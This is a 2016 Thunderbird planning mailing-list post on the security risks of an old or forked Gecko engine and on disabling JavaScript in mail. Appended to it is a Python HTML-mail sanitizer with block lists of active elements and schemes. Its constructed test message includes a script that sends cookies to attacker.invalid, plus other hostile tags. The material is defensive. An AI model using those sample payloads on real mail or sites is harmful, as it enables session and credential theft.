What happened to hiring an architect?

Jim squibblyflabbetydoo at gmail.com
Mon Dec 19 21:33:30 UTC 2016


On Mon, Dec 19, 2016 at 1:50 PM, Disaster Master <disasterlistmanager at gmail.com> wrote:

> On 12/17/2016 7:10 AM, Magnus Melin <mkmelin+mozilla at iki.fi> wrote:
>
> On 16.12.2016 17:24, Disaster Master wrote:
>
> On 12/15/2016 7:02 PM, R Kent James <kent at caspia.com> wrote:
>
> Postbox's new release is on Gecko 7.0.1, which is now over 5 years old. I have not heard any great outcry about their security issues, and someone on this list (...cough..  BK...cough..ensa) keeps telling us what a great product that is, and how popular it is in Mozilla. So clearly forking Gecko is a CHOICE, and if people at Mozilla are using it then some people at Mozilla must not care that it is based on old Gecko, either.
>
>
> This supports my feeling that the security risks are actually much smaller
> for TB than they would be for, for example, Pale Moon.
>
>
> The security risks are very present,
>
>
> Only one person (Jim) has responded with any specifics on these risks, but
> alas didn't respond to my follow-up about how or whether or not it would be
> possible to mitigate said risks - regardless, I didn't grok his response,
> so have no way of knowing if the risks are real (for TB) or not.
>

The only way to mitigate the risks is to reduce the surface area for attack
(by limiting what features we expose to messages). However, one of TB's
selling points is that we have a very good HTML renderer; in an era where
our competition is webmail (even Mozilla itself uses Google Apps for
employee email now!), we need to support as much of HTML as reasonably
possible, or people's emails will look like crap and they'll just go back
to Gmail.

> Would it not be possible to lock down TB to a specific subset of Gecko
> functions in order to let it render basic HTML emails, but minimize or even
> eliminate the security risks that would otherwise plague a full blown web
> browser?
>

How would we know that those features are the ones that are secure? The
only thing we can really drop is JS, since people sending mail should be
able to use anything in HTML/CSS to make their emails look the way they
want (especially important for newsletters). JS vulnerabilities are the
most common, so we've made our lives a lot easier by eliminating that, but
if people wanted to infect users via Thunderbird, I'm 99.9% sure they could
find a way to do it. As I mentioned before though, Thunderbird's userbase
is tiny compared to Firefox's (which is only ~12% of all web users), so
people likely aren't devoting much effort to finding vulns that work in
Thunderbird.

In the long run, I think Thunderbird's current position is untenable, and
even if we could fork Gecko at some point in the future, I'm not sure I'd
want to. At the moment, I'm leaning much more towards asuth's
"glodastrophe" client as a potential spiritual successor to Thunderbird. Of
course, I'm biased, since I helped write some of its backend. :)

- Jim
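The mitigation Jim describes, dropping JavaScript while keeping the HTML and CSS that newsletters rely on, is in practice an allowlist pass over the message body before it reaches the renderer. The following is an added example written for this page; it is not Thunderbird's own code and does not reflect how Gecko's mail sanitizer is implemented. It assumes a minimal policy (script-bearing and document-embedding elements are dropped with their content, `on*` event attributes and `javascript:`/`vbscript:`/`data:text/html` URLs are removed, everything else including inline `style` and `<style>` blocks is passed through) and uses only Python's standard library. The sample message is constructed for the example.

```python
"""Strip active content from an HTML e-mail body while preserving markup and CSS.

Added example (not Thunderbird/Gecko code). Policy assumed here:
  - drop ACTIVE_ELEMENTS together with their subtree
  - drop on* event-handler attributes
  - drop URL attributes whose scheme is javascript:, vbscript: or data:text/html
  - keep all other tags, attributes, inline styles and <style> blocks
"""
from html import escape
from html.parser import HTMLParser

# Elements that execute code or load a foreign document: the feature surface
# the thread is talking about.  Assumed policy, not a complete list.
ACTIVE_ELEMENTS = {"script", "iframe", "object", "embed", "applet", "form"}
# Void elements never get a closing tag, so they must not touch skip-depth bookkeeping.
VOID_ELEMENTS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
                 "link", "meta", "source", "track", "wbr"}
URL_ATTRIBUTES = {"href", "src", "action", "background", "formaction"}
BLOCKED_SCHEMES = ("javascript:", "vbscript:", "data:text/html")


def _normalized_scheme(value):
    """Lowercase the URL and remove whitespace/control characters so that
    obfuscations such as 'JAVA\\nscript:' still match the blocklist."""
    return "".join(ch for ch in value if not ch.isspace() and ord(ch) > 31).lower()


class ActiveContentStripper(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.parts = []        # sanitized output fragments
        self.skip_depth = 0    # > 0 while inside a dropped element's subtree
        self.in_style = False  # <style> content is CSS, not text to re-escape
        self.removed = []      # audit trail of everything stripped

    def _clean_attrs(self, tag, attrs):
        kept = []
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):                      # onclick, onload, ...
                self.removed.append(f"{tag}@{lname}")
                continue
            if (lname in URL_ATTRIBUTES and value is not None
                    and _normalized_scheme(value).startswith(BLOCKED_SCHEMES)):
                self.removed.append(f"{tag}@{lname}={value}")
                continue
            kept.append((lname, value))
        return kept

    def _emit_tag(self, tag, attrs, self_closing=False):
        rendered = "".join(
            f" {name}" if value is None else f' {name}="{escape(value, quote=True)}"'
            for name, value in attrs)
        self.parts.append(f"<{tag}{rendered}{' /' if self_closing else ''}>")

    def handle_starttag(self, tag, attrs):
        if self.skip_depth:
            if tag not in VOID_ELEMENTS:
                self.skip_depth += 1
            return
        if tag in ACTIVE_ELEMENTS:
            self.removed.append(tag)
            if tag not in VOID_ELEMENTS:      # e.g. <embed> has no subtree to skip
                self.skip_depth = 1
            return
        if tag == "style":
            self.in_style = True
        self._emit_tag(tag, self._clean_attrs(tag, attrs))

    def handle_startendtag(self, tag, attrs):
        # <br/>-style syntax: same policy as a start tag, but no end tag follows
        if self.skip_depth:
            return
        if tag in ACTIVE_ELEMENTS:
            self.removed.append(tag)
            return
        self._emit_tag(tag, self._clean_attrs(tag, attrs), self_closing=True)

    def handle_endtag(self, tag):
        if self.skip_depth:
            self.skip_depth -= 1
            return
        if tag == "style":
            self.in_style = False
        self.parts.append(f"</{tag}>")

    def handle_data(self, data):
        if self.skip_depth:
            return
        self.parts.append(data if self.in_style else escape(data, quote=False))

    def handle_comment(self, data):
        # Comments (including IE conditional comments) are dropped outright.
        self.removed.append("comment")


def sanitize_html_mail(html):
    """Return (sanitized_html, list_of_removed_items)."""
    parser = ActiveContentStripper()
    parser.feed(html)
    parser.close()
    return "".join(parser.parts), parser.removed


# Constructed sample message for the example (not a real captured mail).
CONSTRUCTED_MESSAGE = (
    '<p style="color:#c00" onmouseover="steal()">Newsletter</p>'
    '<a href="JAVA\nscript:alert(1)">click</a>'
    '<a href="https://example.org/unsub">unsubscribe</a>'
    '<script>document.location="http://attacker.invalid/"+document.cookie</script>'
    '<iframe src="http://attacker.invalid/"><b>fallback</b></iframe>'
    '<img src="https://example.org/banner.png" alt="banner">'
    '<!--[if IE]><script>bad()</script><![endif]-->'
    '<embed src="http://attacker.invalid/x.swf">'
)

if __name__ == "__main__":
    clean, removed = sanitize_html_mail(CONSTRUCTED_MESSAGE)
    print(clean)
    print("removed:", removed)
```

Note what this does and does not buy you, which is Jim's point: every line of the output still goes to the full layout engine, so CSS, image decoding and the parser itself remain exposed; the allowlist only removes the class of bugs that needs script to trigger. The `removed` audit trail is there so a mail client can show the user what was stripped rather than silently altering the message.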


More information about the tb-planning mailing list